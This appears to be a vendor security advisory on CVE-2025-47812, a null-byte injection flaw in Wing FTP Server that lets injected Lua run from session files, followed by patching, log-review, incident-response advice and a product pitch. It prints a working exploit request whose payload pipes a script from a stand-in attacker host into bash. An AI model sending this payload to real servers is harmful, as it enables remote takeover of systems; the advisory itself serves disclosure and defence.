CVE-2025-47812: Wing FTP Server Remote Code Execution Vulnerability (Null Byte Injection)

Technical Attack Breakdown

A typical exploit request involves an HTTP POST containing the null-byte payload:

POST /loginok.html HTTP/1.1

Host: vulnerable-server.com

username=anon%00print(os.execute("curl -s http://attacker.com/shell.sh | bash"))

How the exploit works:

1. The %00 null byte prematurely terminates the username string during authentication.
2. The complete malicious input is stored verbatim into a session file.
3. Wing FTP executes this session file as a Lua script, granting attackers root-level shell access.

┌───────────────────┐                  ┌──────────────────┐
│                   │  1. HTTP POST    │                  │
│     Attacker      │ ─────────────────▶   Wing FTP       │
│                   │  with %00 payload│   Server         │
└───────────────────┘                  └──────────────────┘
                                               │
                                               │ 2. Authentication Check
                                               ▼
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  username=anon%00print(os.execute("curl attacker.com/shell.sh | │
│  bash"))                                                        │
│                                                                 │
│  ◀─────────────┬───────────────────────────────▶                │
│     Processed  │        Ignored during auth check               │
│     as "anon"  │        but stored completely                   │
└─────────────────────────────────────────────────────────────────┘
                                               │
                                               │ 3. Creates Session File
                                               ▼
┌─────────────────────────────────────────────────────────────────┐
│                        /Session/sess_[ID].lua                   │
│                                                                 │
│  -- Session data                                                │
│  username="anon                                                 │
│  print(os.execute("curl attacker.com/shell.sh | bash"))"        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
                                               │
                                               │ 4. Executes as Lua Script
                                               ▼
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  Server executes script with SYSTEM/root privileges             │
│                                                                 │
│  ┌───────────────────────────────┐                              │
│  │ print(os.execute("curl       │ ──▶ Retrieves & executes      │
│  │ attacker.com/shell.sh | bash"))│      malicious shell script │
│  └───────────────────────────────┘                              │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
                                               │
                                               │ 5. Attacker Gains Control
                                               ▼
┌───────────────────┐                  ┌──────────────────┐
│                   │  6. Remote Shell │                  │
│     Attacker      │ ◀─────────────────  Compromised     │
│                   │  with root/SYSTEM│  Server          │
└───────────────────┘                  └──────────────────┘

The core vulnerability emerges from a fundamental disparity in how different parts of Wing FTP Server process the same input string:

User Input: anonymous%00malicious_lua_code
              |          |
              V          V
Authentication     Session Storage
    Sees:            Stores:
 "anonymous"    "anonymous\0malicious_lua_code"
              |          |
              V          V
             PASS       EXECUTE

Affected Systems

• Wing FTP Server versions earlier than 7.4.4.
  
• Approximately 5,000 internet-facing Wing FTP Server instances are currently vulnerable to this vulnerability (The Hacker News, 2025).
  

Recommended Actions for Application Security Teams

Priority 1:

• Immediately upgrade Wing FTP servers to version 7.4.4 or newer.
  
• If immediate patching is not feasible, temporarily restrict access to /loginok.html using firewall or WAF rules.
  

Priority 2:

• Audit software inventories and Software Bill of Materials (SBOMs) to identify all deployments or embedded instances of Wing FTP.
  
• Examine server logs urgently for %00 patterns and suspicious session file creation under /Session/.
  

Priority 3:

• Disable anonymous FTP accounts immediately.
  
• Rotate all FTP-related credentials.
  
• Limit administrative interface access to internal networks or VPN only.
  

Incident Response Guidelines for SOC/IR Teams

1. Containment:
   
   • Isolate affected hosts immediately.
     
   • Create forensic snapshots of memory and disk, preserving session files under /Session.
     
2. Investigation:
   
   • Inspect logs for outbound requests (curl, wget, PowerShell) and unauthorized file or user account creation or modification.
     
3. Eradication and Recovery:
   
   • Rebuild affected servers from trusted images with Wing FTP version 7.4.4 or later.
     
   • Rotate credentials stored on compromised systems.
     
4. Post-Incident Recommendations:
   
   • Implement monitoring rules targeting Lua script execution and HTTP requests containing %00.
     
   • Conduct a post-mortem and update security training regarding vulnerabilities related to null byte injections.
     

How Kodem Protects Customers

• Kodem SCA customers were instantly able to identify (a) where the vulnerable Wing FTP package was installed, (b) where it was actively running in production, and (c) which instances were reachable and exploitable by attackers. Kodem promptly detected exploit activity, mitigated the immediate threat until patches were deployed, and continued monitoring for future exploitation attempts.
  
• Kodem’s runtime detection capability -leveraging eBPF and memory analysis - immediately identified attacker-triggered Lua executions within Wing FTP Server processes, without requiring an agent on the vulnerable server.
  
• Kodem automatically constructed an attack-chain visualization correlating malicious HTTP requests, Lua executions, and resulting command shells. Initial exploitation attempts were detected by Kodem customers on July 1st, 2025, preceding widespread public advisories.
  

Key Lessons for Security Teams

• Static analysis and SBOMs list installed components but do not reflect runtime vulnerabilities and attacks.
  
• The time between vulnerability disclosure and active exploitation has shortened significantly, often to mere hours, emphasizing the importance of rapid incident response.
  
• Runtime monitoring provides essential context, converting vulnerability data into actionable intelligence. Static vulnerability listings alone are insufficient.
  

In short: “Static findings suggest vulnerabilities. Runtime reveals exploitation.”

References

Arctic Wolf. (2025, July 10). CVE-2025-47812: Wing FTP Server remote code execution vulnerability exploited in the wild. Retrieved from https://arcticwolf.com/resources/blog-uk/cve-2025-47812-wing-ftp-server-remote-code-execution-vulnerability-exploited-in-the-wild/

Help Net Security. (2025, July 11). Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812). Retrieved from https://www.helpnetsecurity.com/2025/07/11/critical-wing-ftp-server-vulnerability-exploited-in-the-wild-cve-2025-47812/

The Hacker News. (2025, July 11). Critical Wing FTP Server vulnerability actively being exploited. Retrieved from https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html